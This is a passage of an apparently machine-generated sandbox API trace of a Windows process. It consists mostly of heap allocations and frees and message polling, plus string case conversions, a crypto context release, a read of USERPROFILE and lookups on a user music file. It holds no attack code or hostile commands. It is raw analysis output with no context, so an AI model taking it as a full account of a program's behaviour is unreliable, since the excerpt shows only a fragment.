returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.491] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.494] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.494] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.495] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.495] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.495] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.496] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.496] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.498] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.499] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.499] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.499] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.499] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.499] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.499] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.499] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.499] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.499] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.499] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.499] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.499] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.499] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.499] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.499] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.500] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.500] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0252.500] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.500] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.500] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.500] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.500] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.500] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.500] FreeLibrary (hLibModule=0x74d40000) returned 1 [0252.500] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.500] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.500] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.503] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.503] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.504] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.504] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.504] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5a) returned 0x240da88 [0252.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", lpFilePart=0x8bedfc*="QeeT.m4a") returned 0x2c [0252.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0252.506] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qeet.m4a")) returned 0x20 [0252.506] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", lpFindFileData=0x8bf030 | out: 